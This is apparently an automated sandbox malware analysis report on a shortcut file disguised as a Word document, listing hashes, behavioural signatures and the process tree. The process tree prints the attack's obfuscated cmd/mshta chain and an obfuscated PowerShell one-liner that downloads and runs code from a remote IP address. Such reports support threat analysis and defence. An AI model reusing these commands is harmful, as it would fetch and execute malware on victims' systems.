Analysis
-
max time kernel
113s -
max time network
119s -
platform
windows7_x64 -
resource
win7 -
submitted
16-07-2020 18:21
General
-
Target
N-388-30.06.2020.docx.lnk
-
Size
60KB
-
MD5
7b5f028144aa35afdf9f4835fa5432b8
-
SHA1
8bf59baf6a003c279e95540bfb92149f6f0ba668
-
SHA256
35bc847e8a2ac7ccb75850cf69db5a47c245ed2a4dc5e98283dfd8f7f9df59e1
-
SHA512
2dd8bf9ab657252f86de10126f4533a3fd0053f8adb6abb2e62d30aebd9fb257d036442f3383bde2ff9fac410f2613a4caccb57fd0ff04dc8c22d164a4ed9ead
Score
8/10
Malware Config
Signatures
-
Suspicious use of WriteProcessMemory 12 IoCs
-
Deletes itself 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 41 IoCs
-
Modifies Internet Explorer settings 1 TTPs 1 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Blacklisted process makes network request 5 IoCs
-
Office loads VBA resources, possible macro or embedded object present
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\N-388-30.06.2020.docx.lnk1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /v /c set m=m^s^h^ta && set a=N-388-^30.06.^2020.^docx.l^nk && if exist "!cd!\!a!" (!m! "!cd!\!a!") else (!m! "!temp!\Temp1_За^прос.z^ip\!a!")2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exemshta "C:\Users\Admin\AppData\Local\Temp\N-388-30.06.2020.docx.lnk "3⤵
- Suspicious use of WriteProcessMemory
- Deletes itself
- Modifies Internet Explorer settings
-
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\N-388-30.06.2020.docx"4⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -c while(!(.("""{0}{1}{2}"""-f ("""{1}{0}""" -f 'st-','Te'),("""{2}{1}{0}""" -f 'ec','onn','C'),("""{1}{0}"""-f'n','tio')) ("""{1}{2}{0}""" -f ("""{0}{1}"""-f("""{1}{0}"""-f'.c','le'),'om'),'g','oog') -q)) {&("""{1}{2}{0}{3}""" -f ("""{0}{1}""" -f("""{0}{1}""" -f 'a','rt-'),'Sl'),'S','t','eep') -s 5} .("""{1}{0}""" -f'ex','i')(.("""{2}{1}{0}""" -f't',("""{1}{0}"""-f 'jec','Ob'),("""{0}{1}""" -f'Ne','w-')) ("""{0}{4}{1}{2}{3}"""-f ("""{1}{0}""" -f 'W',("""{0}{1}"""-f 'Net','.')),'C','li','ent','eb')).("""{3}{4}{1}{2}{0}"""-f'ing',("""{1}{0}"""-f'lo','wn'),("""{1}{0}""" -f 'Str','ad'),'D','o')."""In`Vo`kE"""(("""http://45.61.138.170/decide.php"""))4⤵
- Suspicious use of AdjustPrivilegeToken
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\N-388-30.06.2020.docx
-
memory/612-0-0x0000000000000000-mapping.dmp
-
memory/776-3-0x0000000000000000-mapping.dmp
-
memory/908-2-0x0000000000000000-mapping.dmp
-
memory/1312-1-0x0000000000000000-mapping.dmp
-
memory/1312-4-0x0000000005EB0000-0x0000000005ED3000-memory.dmpFilesize
140KB